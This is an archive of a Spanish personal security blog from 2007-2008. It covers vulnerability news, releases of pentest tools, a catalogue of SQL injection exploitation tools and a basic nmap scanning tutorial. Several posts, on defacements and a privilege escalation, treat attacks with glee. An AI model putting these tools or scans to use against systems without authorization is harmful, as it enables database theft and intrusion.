Las crónicas de SiD

Cerrado por vacaciones!

2008-08-01T11:17:00.001+02:00

Señoras y señores ,el que les escribe se va de vacaciones...

Todo el año esperando este momento! oeoeoeooe Estás vacaciones prometo no tocar ni un solo Pc, ;)

Os veo sobre el 25 de Agosto...con nuevos proyectos que tengo en mente....

FELICES VACACIONES A TODOS/AS

Sql Injection Tools

2008-07-16T09:14:00.006+02:00

Marchando una de Sql Injection!!

SQLIer - SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.

SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.

SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.

SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.

BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.

SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.

Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.

SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.

SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

SQL Power Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.

FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.

SQLNinja - SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.

Automagic SQL Injector - The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.

NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.

Fuente...Sergio Hernando

(IN)secure Magazine, número 17

2008-07-15T10:29:00.001+02:00

Nuevo número de la revista de seguridad on-line número 17

Para descargar pulsa aqui

Actualización de seguridad Iphone/Itouch

2008-07-15T10:07:00.004+02:00

Según he leido hoy en SecurityFocus, Apple ha liberado una actulización de seguridad que subsana 13 problemas de seguridad del famoso Iphone 2.0 y Itouch 2.0....

Apple en una advisory explica de que tratan las vulnerabilidades, y claro...si un teléfono tiene navegador....le aplican las vulnerabilidades relacionadas con... ;)

Será cuestión de tiempo que vuelva a aparecer malware relacionado con la telefonía movil...y en concreto con el famoso Iphone... Es lo que tiene tener un telefono que no solo es teléfono ;)

Es cuestión de tiempo.... tic tac, tic tac.

El iPhone 3G, hackeado el día de su lanzamiento

2008-07-14T10:01:00.004+02:00

Apenas unas horas después de que Apple pusiera a la venta la nueva versión de su deseado teléfono, el iPhone OS 2.0 ha sido desbloqueado y hackeado.

Los consumidores que consigan hacerse con alguno de los nuevos terminales de Apple podrán realizar el jailbreak y liberarlo sin problemas, tal y como se podía hacer con el modelo anterior. El terminal, presentado oficialmente hoy en España y en 21 países más de todo el mundo, ha generado mucha expectación desde que Apple anunció su lanzamiento el pasado 9 de junio en la Conferencia Mundial de Desarrolladores celebrada en San Francisco.

Según indica Gizmodo el nuevo sistema operativo no ha durado ni 24 horas sin ser hackeado, a pesar de que se tardó casi dos meses en hacerse público cómo desbloquear el antiguo firmware.

Gracias a esto, los usuarios tendrán acceso a un gran número de opciones de software, pero sobre todo podrán instalar aplicaciones oficiales e independientes, además de introducir cualquier tarjeta SIM independientemente del operador que sea.

El hack ha sido realizado por iPhone Dev Team, uno de los grupos más activos en este tipo de tareas, haciendo pruebas anteriores en la versión beta del firmware.

Fuente: HackHispano

Manifiesto desde el HackLab "El Patio Maravillas"

2008-07-08T10:00:00.005+02:00

Esto me ha llegado de la lista de distribución del HackLab "El Patio Maravillas"

Por favor, multiplica y difunde, utiliza, mejora...
Respuesta colectiva a consecuencia de los últimos ataques a nuestros derechos digitales y en vista del próximo G8 que se promulga "para la protección de la propiedad intelectual" (sic).
(véase: http://www.publico.es/ciencias/tecnologia/132364/poderosos/p2p).
Esta carta se está enviando al gobierno y a 287 autoridades.
Puedes menear aquí:
http://meneame.net/story/avaricia-rompe-saco-7-propuestas-enviadas-287-autoridades-para-defende

LA AVARICIA ROMPE EL SACO
POR UNA CULTURA LIBRE DE CIUDADANOS QUE COMPARTAN:
7 soluciones/realidades más una.
Una respuesta ciudadana a los últimos ataques a las libertades fundamentales perpetrados en nombre de la Propiedad Intelectual

_____________________________
Por todo esto PEDIMOS:
7 medidas necesarias y urgentes para proteger e impulsar la sociedad del conocimiento en beneficio de todos (todos de verdad ;))

1. Considerar cualquier recorte a las redes de intercambio de archivos (redes P2P) como un acto de oscurantismo y un atentado contra los derechos democráticos fundamentales garantizados por nuestra constitución y por innumerables tratados internacionales que el estado español ha ratificado. Nuestros derechos al conocimiento, al aprendizaje, al acceso a la cultura y a la libertad de expresión se verían gravemente socavados si se limitaran las herramientas de las que dispone actualmente la sociedad.

2. Que las entidades de gestión pasen a ser lo que son: entidades privadas que gestionan SÓLO Y EXCLUSIVAMENTE las “cuentas” de sus socios o sea los derechos de explotación de una parte de los artistas. Que, como toda entidad privada, se permita la libre competencia y que bajo ningún concepto se consienta que entidades privadas hurguen en la privacidad y en los bolsillos de los ciudadanos y menos que se utilicen bienes y suelo público para sus beneficios privados (véase entre miles el ejemplo de la Torre de la Música de Valencia).

3. Que los creadores sean pagados de forma equitativa sean o no socios de entidades de gestión. Que los artistas cobren, si así lo desean, principalmente por su creación y no por la explotación que genera.

4. Abolición inmediata del canon digital, impuesto que sanciona indiscriminadamente la ciudadanía en nombre de la “compensación” a la creación por un delito que no es tal, cuando, en realidad, es recaudado en beneficio de pocas personas privadas que raras veces son creadores y menos de algo que esté relacionado con la Cultura. Pagar por ser sospechoso es propio de las dictaduras.

5. Que una obra pase a ser de Dominio Público en unos plazos beneficiosos para la creación y la sociedad. Permitir que más de una generación viva del trabajo de alguien, es un forma de fomentar el parasitismo y el estancamiento creativo, desactivando la reinversión y más considerando que una medida pensada para favorecer a las personas en realidad beneficia principalmente grandes multinacionales que desvirtúan la creación primigenia. Pedimos el paso al dominio público en un periodo tiempo razonable, dependiendo del tipo de creación, con un máximo de 30 años.

6. Defender el “derecho a cita” como vehículo de crecimiento democrático de la sociedad de la información.

7. Eliminar el concepto de “lucro cesante” en todo lo que concierne a la producción cultural.
_________________________________________________________________________

Y una cosa más:

Porque la cultura libre y colaborativa es la Cultura de nuestra época, porque es un hecho, porque ya no hay vuelta atrás…

EXGAE presenta:

Los premios que barrerán los Grammy, los Goya, los Max …
Los 1º premios no competitivos de la historia de la Cultura…
Los 1º premios internacionales de Cultura de la sociedad digital…

Los premios OXCARS
La eXcelencia es compartir

Martes 28 de octubre de 2008, Sala Apolo – Barcelona

Multiplica y reparte.

Más informaciones:
http://exgae.net
Multiplica y reparte

Ahora me dió por la auditoría de redes Wifi ;)

2008-07-08T09:21:00.007+02:00

Buenas a todos...

Sabéis por lo que me ha dado ahora?...si por la auditoría de redes Wifi.. a quien no le gustaría saber lo fácil que resulta romper el cifrado de su conexión WEP?

Estoy utilizando una distro, que es un Live Cd de linux para hacer las auditorías, en concreto la distro es WifiSlax

Este Live Cd tiene las herramientas necesarias para realizar una auditoría, y lo que es más importante...los drivers para diferentes tarjetas wifi! larga vida al modo monitor....!

Los foros como siempre en estos casos son de obligada visita, para enterarnos como se realiza una auditoría Wifi

Así que ya sabeis descargar el live cd aqui

Ahhhh como siempre os diré que este tipo de herramientas son con fines educativos y no para pisarle el wifi al pobre vecino de turno....porque quien sabe a lo mejor el vecino soy yo mismo! y os llevais una sorpresa!

Volveré....

2008-06-09T17:36:00.002+02:00

Buenas a todos...

Por motivos laborales y personales he dejado un mes el blog de lado...en breve, lo actulizaré con nuevas cosillas...

Saludos!!!

Vulnerabilidad en KDE 3.x y 4.x

2008-04-29T15:08:00.005+02:00

Se ha publicado la existencia de diferentes vulnerabilidades en los entornos gráficos KDE 3.x y 4.x (que decir que son los entornos gráficos de diferentes distribuciones de Linux).

Las vulnerabilidades son las siguientes:

La primera vulnerabilidad está causada por un desbordamiento de búfer
basado en pila debido a que KDE KHTML falla al comprobar los límites de
las entradas introducidas por un usuario al procesar archivos PNG
maliciosos. Esto podría ser aprovechado por un atacante remoto para
ejecutar código arbitrario o causar una denegación de servicio en KDE.
La segunda vulnerabilidad está causada porque la utilidad
'start_kdeinit' de KDE podría permitir múltiples escaladas de
privilegios provocadas por fallos al comprobar las entradas.

Personalmente me encanta la segunda vulnerabilidad, ¿por que?....porque cuantas máquinas con X Windows conoceis en las DMZ? jajajajaja (risa malefica) muchos admin les gusta tener entorno GUI.... Hace falta tener acceso de root...? jajaja (más malefica) o con un usuario básico ya se puede....ejem...

Lo mejor....como siempre parchear.

Nuevo número INSECURE MAGAZINE

2008-04-29T12:52:00.003+02:00

Se ha publicado el nuevo número de la revista INSECURE MAGAZINE, revista toltalmente gratuita y para mi gusto algunos artículos osn interesantes

Para descargarla pulsa aqui

En breve nuevas entradas....

Escalada de privilegios en Micro$oft Window$

2008-04-20T11:33:00.005+02:00

Una vez más...

Hará cosa de un mes leí en Kriptopolis un artículo interesantísimo ;) en dicho artículo se contaba que un consultor de seguridad había encontrado una manera de vulneral los nuevos servers 2008 de Micro$oft..

Pues bien, dicho consultor ha demostrado que no solo los nuevos servidores Window$ $erver 2008 son vulnerables, sino que afecta también a la familia de servidores 2003, y agarraos!! a Window$ Vi$ta y Window$ Xp. La demostración se ha llevado a cabo en HITBSecConf 2008 en Dubai

La vulnerabilidad trata de una escalada de privilegios en usuarios del sistema como NETWORK SERVICE or LOCAL SERVICE..ahí queda eso.... La presentación la teneís aquí...

Micro$oft ha publicado un boletín de seguridad en donde avisa de la vulnerabilidad, pero donde no se ve nada de ningún parche... quien sabe a lo mejor dentro de un mes...un año...lo sacan..

Mientras en CVE...

Igualito que linux y los parches a sus vulnerabilidades..

No os digo na, de como se van a llevar esta primavera los Xploit 0-Day, para esta vulnerabilidad

El arte de la intrusión

2008-04-09T12:27:00.002+02:00

Un poco de lectura y de paso de cultura...que no leemos nada!!!

En uno de los foros que estoy susbcrito uno de los parroquinos ha dejao un link desde donde uno puede descargarse el libro "El arte de la intrusión" por Kevin D Mitnick

Me lo he descargado y en cuanto tenga tiempo le echaré un vistazo...

Para descargarlo pulsa aquí

Esos CPD´s...(una imagen vale más que....)

2008-04-02T13:07:00.006+02:00

Quien no ha entrado en algún CPD y a visto estas cosas??

Una imagen vale más que mil palabras...y sino pulsar aqui

New Versión tool:Nmap 4.60

2008-03-26T17:04:00.003+01:00

Liberada la nueva versión de la todopoderosa herramienta Nmap 4.60, una vez más Fydoor incluye más funcionalidades.

Que decir de esta herramienta? si hasta aparece en películas !!!

A todo esto, Nmap a que fase pertenece dentro de un pentest? enumeración, footprinting, scanning? ;)

Deberías descargártela aqui

Os imaginais una auditoría sin Nmap?

Cyber Storm II

2008-03-19T14:19:00.006+01:00

El otro día leí que el Tio Sam había realizado unas "maniobras" durante 5 días atacando a sus sistemas TIC.

La finalidad de dichas "maniobras" era probar la respuesta de sus sistemas ante diferentes cyber-ataques. Las "maniobras" han recibido el nombre de "Cyber Storm II".

Han participado expertos de seguridad informática de 5 paises y más de 40 empresas privadas. Los participantes han tenido que sufrir 1800 ataques simulados desde diferentes ubicaciones y cometido por "hackers" (huyyyyyyy por hackers que malosss).

Os imaginais hacer lo mismo con las infraestrudturas TIC de nuestro país? jajajajaja.

Las maniobras serían conocidas como...imaginar jajajaja. La verdad y sin que sirva de precedente, es que este tipo de iniciaivas, me parecen una muy buena idea, aunque sea idea de los yankis. Como de verdad sacas una foto a la seguridad de tus sistemas de información es viendo como responden estos a verdaderos ataques y dejando de especular.

La noticia aquí

En el 2006 los yankis ya hicieron algo similar más información

Instalando BackTrack 3 Beta

2008-03-12T12:25:00.004+01:00

Buenas a todos....

Seguro que a más de uno le interesaría tener la versión 3 Beta de Backtrack en una de sus máquinas virtuales... ;)

Pues como a mi me ha pasado ya, os paso el link de un video donde lo explica bastante bien....

Video aqui

Dedicado a los futuros CEH ;)

Defecement....to Izquierda Unida

2008-03-02T20:18:00.003+01:00

Ahora los a"afurtunados" del defadement de su Url ha sido Izquierda Unida (IU)....

De nuevo los mismo autores "D.O.M TEAM 2008"...."Tenemos algo en común, le dijo un presidente a un embustero" con esta frase han firmado el defacement...

La noticia aquí

Por cierto la URL sabeis donde estaba alojada???? en....Arsys si si, la empresa que ya sufrió otro ataque...

Como preguntón que soy....

Que significado ha tenido este ataque? ha sido directamente político?
Ha sido un ataque premeditado?

Este grupo de Hackers está siendo de los más activos de la scene les cazarán?....

Defacement....to Jazztel

2008-02-26T15:53:00.005+01:00

Como me gusta, el publicar este tipo de post (ñam ñam).....entre otras cosas, porque no se ha publicado nada en ningún medio....ni tan siquiera en ningún CERT...por alarma social? jajaja que jeta... que teneis!!!

Que pasa que no ha ocurrido nada? o....que da miedo que nos enteremos que una empresa como Jazztel, haya sido objetivo de un ataque Web con éxito? Y...claro, si se ha tenido éxito, cual ha sido el alcance del defacement? no habrán sacado datos privados de los usuarios registrados en Jazztel verdad? Datos como...cuentas bancarias, teléfonos etc...como no dicen nada, quien me dice a mi que los datos de los usuarios de Jazztel están a salvo?

Aqui teneis las pruebas (Chema...estamos contigo en el Black Hat aunque no podamos ir!! )

Más pruebas.....

Fotos del defacement aquí

El grupo al que se le atrivuye la gesta... D.O.M Team integrantes{ anonyph; arp; ka0x; xarnuz }

Preguntas que me surgen:

Para que sirve un CERT? y en concreto el que pagamos todos los españoles con nuestros impuestos? CCN-CERT
Porque Jazztel no dice nada de este "evento" de seguridad?
Visto lo visto si soy usuario de Jazztel mis datos privados están seguros?
A que se dedica la Oficina de seguridad de Jazztel?
Jazztel ha realizado un SGSI?

Gracias a este grupo de Hackers, me doy cuenta de lo concienciada que esta Jazztel con el tema de la seguridad...!

Penetration Testing Framework 0.4

2008-02-19T20:13:00.004+01:00

La gente de VulnerabilityAssesment ha liberado Penetration Testing Framework 0.4....Yo que vosotros echaria un vistazo porque es una guia completa de los pasos a seguir como las herramientas a utilizar en cada paso en un Test deIntrusión....

Pronto subiré más posts...con permiso de la Sra Bronquitis..... ;)

SymbOS/Beselo

2008-01-31T10:23:00.000+01:00

Quien dijo que no ya no existían virus para móviles????

A aparecido un espeicmen nuevo que infecta a teléfonos móviles, dicho especimen responde al nombre de.... SymbOS/Beselo....

Y que es a lo que se dedica hacer el bichito?

Replicación via Bluetooh
Replicación vía MMS
Ocultación de procesos (maliciosos claro)
Replicación a través de tarjetas MMS

Según dice Sergio Hernando en su blog "La idea es la de siempre. Estos gusanos se diseminan vía mensajes MMS y/o Bluetooth, con la idea de engañar a los usuarios incautos para que instalen aplicaciones SIS de Symbian que volverán a diseminar el gusano, y que además, provocarán efectos nocivos en el terminal móvil (el más fácil de comprender, el gasto que provoca el envío indiscriminado de MMS para autopropagación). La diferencia fundamental es que los gusanos de la familia SymbOS/Beselo envían ficheros multimedia identificables y que crean familiaridad con los usuarios, en vez de ficheros SIS. Se han identificado envíos de archivos de imagen, mp3 y Real Media (beauty.jpg, sex.mp3, y love.rm) que hacen más probable que el usuario acepte estos envíos maliciosos Bluetooth".

Así que ojo al dato....si frecuentamos, aeropuertos, cybercafes y otros lugares donde el Bluetooh campa a sus anchas...a lo mejor alguien nos envia un archivo...aceptareis? os gusta la aventura?

Cambio y corto!

Capsdesi: Asignatura Temas Avanzados de Seguridad y Sociedad de la Información

2008-01-29T11:55:00.000+01:00

Nuevos eventos, nuevas fechas...

PROGRAMA

Martes 26 de Febrero: Seguridad: Un aspecto esencial para la tutela de la protección de datos. Impartido por Celia Fernández, profesora de Derecho UPM
Martes 11 de marzo: Inseguridad en redes inalámbricas: WiFi, Bloetooth y RFID.Impartido por Sergio Gonzalez y Felix Ortega; WiFiSlax
Martes 1 de abril:Introducción a la criptografía cuántica:alternativas y retos actuales.Impartido por Fernando Acero Hispalinux
Martes 15 de abril:Malware.Impartido por Sergio de los Santos; Hispasec
Martes 29 de abril:Documentos electrónicos que convivien con los de papel.Impartido por Julian Ina; Abalia
Martes 13 de mayo:Auditoria de seguridad.Certificaciones en seguridad.Impartido por Gemma Deler Applus+ala de Grados de la EUITT. Hora: de 10:00 a 12:00 horas

Asistencia gratuita!!!! más información en el sitio web

Metasploit Framework 3.1

2008-01-29T11:28:00.001+01:00

Se ha liberado la nueva versión de Metasploit Framework 3.1 y un servidor se la está descargando.....

Esta última versión como la anterior tiene entorno gráfico, da "full support"a Windows y tiene 450 módulos y 256 exploits....(alguno 0 Day? jejejeje)

Para acceder a la url pulsa aquí

Por una vez estoy orgulloso de mi pais

2008-01-28T11:48:00.000+01:00

Por una vez y que sin sirva de precedente, me siento orgulloso de mi país....

El motivo: España a la cabeza de europa de descarga de música pirata

He leido un artículo en un periódico en su formato electrónico en donde se relata que nuestro queridísimo país, está en la cabeza de descargas de música "pirata" (pirata que bonito....).

No os perdais la noticia

Según dice la noticia "En 2007, la venta de música en Internet y a través de canales móviles alcanzó los 1.970 millones de euros (539 millones más que en el ejercicio anterior), lo que supone el 15% del negocio discográfico, que en 2006 era del 11% y era inexistente en 2003".

Vamos que si con estos números, más el canon digital, los artistas pierden dinero...

Rage Against The Machine!!

2008-01-21T20:50:00.000+01:00

Una vez dije...que si se me daba la oportunidad de ver a quienes son mis ídolos en directo...haría lo que fuese posible e imposible por verlos...

Pues bien...ha llegado el momento!!! RAGE AGAINTS THE MACHINE vienen a Madrid!! en concreto al Electric Weekend Getafe

Que decir de las letras de este grupo y de su constante revindicación....!! Con Zack de nuevo haciendo daño!!

LONG LIFE FOR RAGE AGAINST THE MACHINE

REVOLUCION!!!

Abuela....! coge el mando!

2008-01-09T11:50:00.000+01:00

Según he leido hoy en la edición de un periódico electrónico, La reyna Isabel II juega a la Wii...No te lo pierdas!!! La reyna madre, ha estado jugando con su nieto Guillermo a la Wii...quien ha sido el que ha acercado la tecnología a la "yaya".

Estoy pensando en coger por banda a algunos de mis abuelos...y sentarlos delante de un monitor...el experimento puede ser interesante.....

Estoy a favor de que no haya barreras para el uso de la tecnología, que su uso no sea solo por una serie de personas en concreto, el acceso a la información tiene que ser universal y por eso mismo, cualquier persona(sin destinguir edad, sexo, etc...) debería poder utilizar la tecnología como herramienta de acceso a la información...y como no, como diversión ;)

Asi pues...abuela....! coge el mando!

La noticia la teneis aquí

Es tu contraseña lo suficientemente robusta? ;)

2008-01-03T16:01:00.000+01:00

Otro video que te ayuda a verificar la robusted de tu contraseña jajajaja (risa malefica) quieres saber ehhhh pulsa AQUI

Humor....de informatico

2008-01-02T15:35:00.000+01:00

Liberada la versión 3.0 Beta del live cd BackTrack

2008-01-02T11:30:00.000+01:00

La gente de BackTrack ha liberado una nueva versión de la famosa herramienta para los pen-testers.

Destacar que la nueva versión añade la siguientes características a las ya conocidas:

Posibilidad de instalar BackTrack en un USB con una imagen de 700 Mb.
Soporte para los microprocesadores DUAL CORE.
Más modelos de tarjetas WIFI soportados.
Configuración de XORG ha sido mejorada
Actualizados los repositorios de los Exploits y Metasploit Framework
Arranque PXE añadida a la versión USB
Añadida a la version USB PwnSauce Instant John the Ripper.

Change log aquí

Os ha gustado ehhhhh entonces... descárgalo aquí

Cross-site scripting en el interfaz web de ZyXEL P-330W Wireless Router

2008-01-02T11:15:00.000+01:00

Buenas a todos....

Aunque sea una vulnerabilidad de año pasado :P cuantos de vosotros teneis el router ZyXEL P-330W? Gracias a nuestros queridísimos ISP alabados sean! tenemos routers con vulnerabilidades...

En concreto el modelo P-330W de ZyXEL en su interfaz web de administración "sufre" cross-site scripting (XSS).

La vulnerabilidad está causada porque la interfaz no filtra de forma
adecuada el código HTML de entrada, introducido por el usuario, antes de
que éste sea mostrado. Esto podría ser explotado por un atacante remoto,
por medio de una URL especialmente modificada, para ejecutar código
JavaScript o HTML arbitrario. El código se originaría desde la interfaz
web del router y sería ejecutado en el contexto de seguridad del usuario
que visita dicha URL.

El atacante podría tener así acceso las cookies de usuario, incluidas
las de autenticación, o a cualquier otra información que haya sido
enviada recientemente al router a través de formularios web. Además
podría realizar acciones en dicha web con los credenciales del usuario,
pudiendo así cambiar la configuración del router.

Recientemente se ha publicado un exploit en el que se muestra como
cambiar la contraseña de administrador del router. La vulnerabilidad
está confirmada para la versión ZyXEL P-330W Wireless Router aunque
podría afectar a otras versiones. Por el momento existe ningún parche
disponible proporcionado por el fabricante.

Información sacada de....Hispasec

Feliz año nuevo!

2008-01-02T11:06:00.000+01:00

Nmap 4.50 (10th Anniversary Edition) released!!

2007-12-18T11:41:00.000+01:00

Me congratula comunicaros que Fyodor ha liberado una nueva versión para NMAP en concreto la versión 4.50...con el pretexto de que la herramienta ha cumplido 10 años... ahí es nada....

En esta nueva versión se han incluido nuevas funcionalidades...pulsa aquí

Y para los que utilizan NMAP por primera vez entorno gráfico....

Yo que tú me la descargaba

Vulnerabilidad en Apache 1.3.x y 2.2.x : XSS

2007-12-18T11:27:00.000+01:00

Buenas.........

Otra vulnerabilidad descubierta en este caso le cae al servidor Web Apache...

La vulnerabilidad que afecta a las versiones 1.3.x está localizada en el mod_imap y está causada porque algunas entradas no se eliminan antes de ser vueltas a los usuarios.Esto...podría ser utilizado por un atacante remoto para inyectar código ejecutable (JavaScript p.ejem). Para que la vulnerabilidad pueda ser explotada se requiere que mod_imap esté activado y sus ficheros
accesibles de forma pública.

La vulnerabilidad que afecta a las versiones 2.2.x está localizada en la función mod_imagemap y al igual que la anterior, permite inyectar código ejecutable porque las entradas no se eliminan correctamente.Para que la vulnerabilidad pueda ser explotada se requiere que mod_imagemap esté activado y sus ficheros accesibles de forma pública.

Más información:

Para las versiones 1.3.x

Para las versiones 2.2.x

Información obtenida de Hispasec

Vulnerabilidad Microsoft FTP Client

2007-12-05T11:06:00.000+01:00

Una vulnerabilidad más pal saco.....

Vulnerabilidad descubierta el 20 de Noviembre y comunicada al fabricante el 28 de Noviembre.

Resumen: La vulnerabilidad descubierta en el cliente FTP de Microsoft, produce como resultado un BufferOverflow en la máquina víctima.

Aplicaciones afectadas: Microsoft FTP Client

Plataformas afectadas: W2K Server, W2K Professional, Wxp, otras versiones pueden verse afectadas.

Descubridor: Rajesh Sethumadhavan

Descripción: Un usuario malintencionado (ñam ñam...jajajaja) puede crear un paquete con un payload determinado el cual se ejecute cuando un usuario ejecuta comandos FTP tales como: "mget" , "ls", "dir", "username" y "password", y el resultado es un BufferOverflow en la máquina cliente.

Impacto: La vulnerabilidad puede permitir la ejecución de código arbitrario con los privilegios del usuario logeado.

Proof of concept: "mget" "list"

Solución: No existe solución.....no se ha publicado parche.

Aquí tenéis pantallazos de los resultados de la vulnerabilidad.... (especial dedicación...rocherna&company)

Link donde se explica la vulnerabilidad

Empezarán a crecer como setas los servidores FTP en internet....??? jajajajajaja (risa malefica)

Tools

2007-12-04T10:15:00.000+01:00

Buenas a todos

Una nueva de ristra de herramientas para descargar....

De la gente de S21 Yersinia

De la gente de Isecom Scare

No les conozco pero presumen de que su herramienta ocupa el segundo lugar en el ranking de Les Trophées du Libre 2007. Unicorn

Auditando IDS??? Tcpopera

Ala chicha teneis.... y comentarios????

nUbuntu

2007-11-28T10:56:00.001+01:00

nUbunto es una distro, basada como no en Ubuntu, con la peculiridad, de que es un sistema operativo al que se le añaden una serie de herramientas muy interesantes y al que se le ha desinstalado paquetes innecesarios tales como: Gnome, Openoffice.org, y Evolution.

La intención de sus creadores era la de utilizar un S.O, "tunneado" que facilite la ardua tarea de los Pen-testers....;)

Visita obligada a la url de nUbuntu

Para descargarlo pulsa aquí

Unos Screenshots de la distro?

Algún comentario???

Nueva versión Firefox 2.0.0.10+ Plug-ins Pen-tester

2007-11-28T09:55:00.000+01:00

Se ha liberado la nueva versión del navegador Firefox 2.0.0.10 dicha versión corrige tres vulnerabilidades .

Yo que tú, actualizaba...para descargarlo pulsa aquí

Y si de paso quieres un par de plug-in para Firefox, te comentaré que en esta url tienes dos y que vienen de maravilla para cualquier pen-tester.Los dos plug-in son para realizar XSS y SqlInjection.

Una vez descargardos, instalarlos en el navegador, reiniciarlo y vereís vereís....

Para cualquier duda, visitar las FAQ en la misma URL.

Que os parece? interesantes plug-ins....

Detención del "Hacker del año"

2007-11-23T12:27:00.000+01:00

Ha sido detenido el consultor de seguridad sueco Dan Egerstad que este verano reveló datos sensibles de numerosas embajadas que utilizaban la red TOR para asegurar su anonimato....

Le encontraron con 8 PS2 en su apartamento, y le han acusado de robo, entre las acusaciones que recibirá claro....jode que vicio tenía el colega con la PS2....

La noticia la tenéis aquí

El tipo de ataque que realizó, era muy básico a la vez de ingenioso, la red TOR ayuda a obtener anonimato, pero no cifra las conexiones con lo que si os echais un vistazo a como funciona la red TOR seguro que se os hubiese ocurrido algo similar como colaborar con un nodo más en la red TOR y ponerse a escuchar conexiones...ñam ñam....

Para ver la noticia pincha aquí

Si hubiese publicado de otra manera su investigación, seguramente hubiese tenido menos problemas de los que va a tener, aunque hoy en día cualquier aviso de una vulnerabilidad tiene su precio...no creeis?

Nuevo número de INSEGURE MAGAZINE

2007-11-23T10:12:00.000+01:00

Insegure Magazine ha publicado su número nuevo 14 esta revista es de contenido totalmente gratuito y se publica cada 3 meses (si no me equivoco...)

Los contenidos de este mes son:

Attacking consumer embedded devices
Review: QualysGuard
CCTV: technology in transition - analog or IP?
Interview with Robert "RSnake" Hansen, CEO of SecTheory
The future of encryption
Endpoint threats
Review: Kaspersky Internet Security 7.0
Interview with Amol Sarwate, Manager, Vulnerability Research Lab, Qualys Inc.
Network access control: bridging the network security gap
Change and configuration solutions aid PCI auditors
Data protection and identity management
Information security governance: the nuts and bolts
Securing moving targets
6 CTOs, 10 Burning Questions: AirDefense, AirMagnet, Aruba Networks, AirTight Networks, Fortress Technologies and Trapeze Networks

Url de la revista aquí

Para descargar la revista en formato .pdf aquí

Mod´s de validación para Apache

2007-11-23T09:28:00.000+01:00

Buenos días....

He encontrado una entrada interesante en el blog de Sergio Hernando que nos cuenta los diferentes métodos que nos ofrece Apache para validación....

Os he colocado los que me parecen más interesantes:

mod_auth_MAC Autenticación basada en MAC...cuidado con los posibles ARP Poison...;)
mod_auth_openpgp Autenticación basada en cifrado simétrico...clave pública.
mod_auth_ldap Autenticación basada en LDAP.
mod_authn_digest Autenticación basada MD5
mod_auth_radius Autenticación por RADIUS
mod_auth_shadow Autenticación basada en /etc/passwd o similares, de sistemas Nix*

Ahora solo falta que algún íntrepido Admin, le pique el gusanillo de la seguridad y con permiso de su todopoderoso jefe le de la "gracia" (que no es poco) de implementar estos mod para apache..

Comentarios?

Actualización YA

2007-11-21T21:06:00.001+01:00

Hola a todos en breve actualizaré el blog con nuevos contenidos...

Seguiré dando caña ;)

Cambio y corto!

Nmap II

2007-11-04T09:12:00.000+01:00

Seguimos con los comandos básicos para aprender como funciona nmap

Existen distintos tipo de scanneo como nos indica la herramienta....

SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags

Se pueden lanzar diferentes tipos de conexión -sS (SYN) -sA (ACK) -sF (FIN)
Con lo que una sintaxis del scanneo de un host sería:

nmap -sS xxx.xxx.xxx.xxx

Según utilicemos el tipo de conexión para cualquier scanneo obtendremos una respuesta u otra ;)

Como bien sabemos los firewalls, una de las primeras cosas que suelen hacer es descriminar el tráfico ICMP por las consecuencias que pudiese tener...

nmap -sS xxx.xxx.xxx.xxx -P0 en nmap no emitir tráfico ICMP se hace con la opción -P0 ;)

Como dice la herramienta podemos, especificar el rango de puertos a utilizar...

PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast - Scan only the ports listed in the nmap-services file)
-r: Scan ports consecutively - don't randomize

Un ejemplo para scannear un servidor web sería....

nmap -sS xxx.xxx.xxx.xxx -P0 p80

Con estos primeros pasos, ya se pueden hacer pruebasde ver como responde la herramienta, más adelante explicaré más funcionalidades e interpretación de resultados....

Saludos domingueros!!!

Educación Vs Capacidad

2007-11-02T09:35:00.000+01:00

Esta mañana he leido en un periodico un interesante artículo, con el que me he sentido identificado, en dicho artículo se habla de como un chaval, de 16 años, es capaz de dar soporte avanzado y "pegarse" desde hace 5 años con su distro de Linux, y a la vez ser un mal estudiante.

